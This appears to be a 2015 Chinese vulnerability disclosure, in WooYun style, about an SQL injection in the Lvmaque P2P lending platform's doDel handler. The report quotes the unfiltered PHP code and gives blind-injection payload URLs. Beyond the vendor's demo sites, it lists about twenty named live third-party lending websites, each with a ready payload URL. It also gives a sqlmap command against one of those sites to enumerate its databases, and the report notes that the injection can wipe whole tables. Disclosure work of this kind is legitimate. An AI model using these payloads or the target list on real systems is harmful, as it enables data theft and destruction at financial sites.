2015-08-10: 细节已通知厂商并且等待厂商处理中 2015-08-10: 厂商已经确认,细节仅向厂商公开 2015-08-13: 细节向第三方安全合作伙伴开放 2015-10-04: 细节向核心白帽子及相关领域专家公开 2015-10-14: 细节向普通白帽子公开 2015-10-24: 细节向实习白帽子公开 2015-11-08: 细节向公众公开
绿麻雀是一款专业的p2p借贷系统,并且提供p2p网贷平台的全方位技术支持和网站运营策划,拥有一支高素质,高学历的技术管理团队,都是来自IT前沿,拥有高超的技术和丰富的制作经验。能为客户提供稳定,高效的服务以及解决问题的最佳方案。
通杀sql注入漏洞,涉及官方多个版本.漏洞文件:App\Lib\Action\HCommonAction.class.php:
//删除数据 public function doDel(){ $model = D($this->getActionName()); if (!empty($model)) { $id = $_REQUEST['idarr']; if (isset($id)) { if (method_exists($this, '_doDelFilter')) { $this->_doDelFilter($id); } if (false !== $model->where("id in ({$id})")->delete()) { $this->success(L('删除成功'),'',$id); } else { $this->error(L('删除失败')); } } else { $this->error('非法操作'); } } }
$_REQUEST['idarr']没有经过任何过滤直接进入sql。
系统为 thinkphp mvc结构,所有继承HCommonAction类的action都存在注入,但可以注入的只有几个,原因是系统默认情况下只创建了几个action所对应的表,而其他action因为表不存在而无法注入。以下三个可以注入:
http://localhost/home/borrow/doDel/idarr/updatexml(1,if(1=1,1,0x22),1)http://localhost/home/Feedback/doDel/idarr/updatexml(1,if(1=1,1,0x22),1)http://localhost/home/Fund/doDel/idarr/updatexml(1,if(1=1,1,0x22),1)
mysql盲注,1=1 返回 "\u5220\u9664\u6210\u529f" ==> "删除成功". 1=2 返回 删除失败注入发生在delete语句,对数据影响很大,通过注入可以清空全表。
官方多个版本都受到影响:
绿麻雀系统P2P版https://11.lvmaque.cn/home/Feedback/doDel/idarr/updatexml(1,if(1=1,1,0x22),1)http://11.lvmaque.cn/home/borrow/doDel/idarr/updatexml(1,if(1=1,1,0x22),1)http://22.lvmaque.cn/home/borrow/doDel/idarr/updatexml(1,if(1=1,1,0x22),1)http://22.lvmaque.cn/home/Feedback/doDel/idarr/updatexml(1,if(1=1,1,0x22),1)http://22.lvmaque.cn/home/fund/doDel/idarr/updatexml(1,if(1=1,1,0x22),1)绿麻雀系统P2P+P2Chttp://33.lvmaque.cn/home/borrow/doDel/idarr/updatexml(1,if(1=1,1,0x22),1)http://33.lvmaque.cn/home/Feedback/doDel/idarr/updatexml(1,if(1=1,1,0x22),1)绿麻雀系统P2C版http://44.lvmaque.cn/home/Feedback/doDel/idarr/updatexml(1,if(1=1,1,0x22),1)http://44.lvmaque.cn/home/fund/doDel/idarr/updatexml(1,if(1=1,1,0x22),1)http://44.lvmaque.cn/home/borrow/doDel/idarr/updatexml(1,if(1=1,1,0x22),1)绿麻雀系统P2P+理财http://55.lvmaque.cn/home/borrow/doDel/idarr/updatexml(1,if(1=1,1,0x22),1)http://55.lvmaque.cn/home/fund/doDel/idarr/updatexml(1,if(1=1,1,0x22),1)http://55.lvmaque.cn/home/Feedback/doDel/idarr/updatexml(1,if(1=1,1,0x22),1)
google搜索到1000多家站点:
随便挑几个都存在注入:
http://www.keyidai.com/home/borrow/doDel/idarr/updatexml(1,if(1=1,1,0x22),1)https://www.zj-bank.com/home/borrow/doDel/idarr/updatexml(1,if(1=1,1,0x22),1)http://shoufax.com/home/borrow/doDel/idarr/updatexml(1,if(1=1,1,0x22),1)http://www.yooxindai.com/home/borrow/doDel/idarr/updatexml(1,if(1=1,1,0x22),1)http://www.zgcfbank.com/home/borrow/doDel/idarr/updatexml(1,if(1=1,1,0x22),1)http://www.nuojincaifu.com/home/borrow/doDel/idarr/updatexml(1,if(1=1,1,0x22),1)http://www.shanghuicf.com/home/borrow/doDel/idarr/updatexml(1,if(1=1,1,0x22),1)http://www.moneyhaodai.com/home/borrow/doDel/idarr/updatexml(1,if(1=1,1,0x22),1)http://www.edingtou.com/home/borrow/doDel/idarr/updatexml(1,if(1=1,1,0x22),1)http://www.hjhdai.com/home/borrow/doDel/idarr/updatexml(1,if(1=1,1,0x22),1)http://www.zcjutou.com/home/borrow/doDel/idarr/updatexml(1,if(1=1,1,0x22),1)http://www.cyy51.com/home/borrow/doDel/idarr/updatexml(1,if(1=1,1,0x22),1)https://www.fangyidai.com/home/Feedback/doDel/idarr/updatexml(1,if(1=1,1,0x22),1)http://www.junbaow.com/home/Feedback/doDel/idarr/updatexml(1,if(1=1,1,0x22),1)http://www.sjcfu.com/home/Feedback/doDel/idarr/updatexml(1,if(1=1,1,0x22),1)http://www.zczb100.com/home/borrow/doDel/idarr/updatexml(1,if(1=1,1,0x22),1)http://www.yooxindai.com/home/borrow/doDel/idarr/updatexml(1,if(1=1,1,0x22),1)http://www.taishengyd.com/home/borrow/doDel/idarr/updatexml(1,if(1=1,1,0x22),1)http://www.jinlingdai.cn/home/borrow/doDel/idarr/updatexml(1,if(1=1,1,0x22),1)https://www.qsyidai.com/home/borrow/doDel/idarr/updatexml(1,if(1=1,1,0x22),1)
sqlmap.py -u "http://www.cyy51.com/home/feedback/doDel" --data "idarr=updatexml(1,if(1=1*,1,0x22),1)" --dbms=mysql --technique=B --random-agent --threads=10 --dbs
参数过滤做得挺好,却遗漏了这个点。
危害等级:低
漏洞Rank:5
确认时间:2015-08-10 16:38
非常感谢您的报告,和乌云网站,问题已经着手处理
暂无